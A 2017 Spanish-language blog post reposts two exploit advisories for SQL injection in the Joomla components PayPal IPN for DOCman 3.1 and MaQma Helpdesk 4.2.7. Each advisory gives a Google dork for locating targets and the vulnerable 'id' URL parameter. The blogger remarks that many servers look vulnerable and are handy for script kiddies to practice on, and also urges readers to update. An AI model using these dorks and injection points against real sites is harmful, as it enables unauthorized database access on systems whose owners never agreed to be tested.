lunes, 20 de febrero de 2017

2 new SQL Injection 0dayz in JOOMLA 20-02-17





Como todos los días amigos, aquí les dejamos dos nuevos 0dayz  para JOOMLA y como siempre los plugins o mejor llamados COMPONENTES son el punto débil de este CMS.

Vulnerabilidad que los afecta: SQL INJECTION
 
Autor:  Ihsan Sencan

Los 0dayz son:

Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection 

# # # # #
# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_docmanpaypal
# Date: 20.02.2017
# Vendor Homepage: http://shopfiles.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
# # # # #

Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection

 

# # # # #
# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
# Google Dork: inurl:index.php?option=com_maqmahelpdesk
# Date: 20.02.2017
# Vendor Homepage: http://componentslab.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
# Demo: http://demo.componentslab.com/index.php/department/software-support
# Version: 4.2.7
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
# # # # #

Basados en la busqueda del DOrk de estos bugs 0dayz existen mas de:



Servidores que albergan JOOMLA  y son presumiblemente vulnerables...... UP´S  UNA BUENA CANTIDAD para los scriptkidies para practricar.



SALUDOS  AMIGOS  Y ACTUALIZEN SUS COMPLEMENTOS.

LI. RODOLFO H. BAZ
WWW.RODOLFOHBAZ.NET



No hay comentarios:

Publicar un comentario

Crowdstrike -> Solución de errores de actualización de CrowdStrike con BitLocker habilitado

En este pequeño articulo ver como componer el problema de CROWDSTRIKE cuando esta habilitado el BITLOCKER, cabe resaltar que puede ser una e...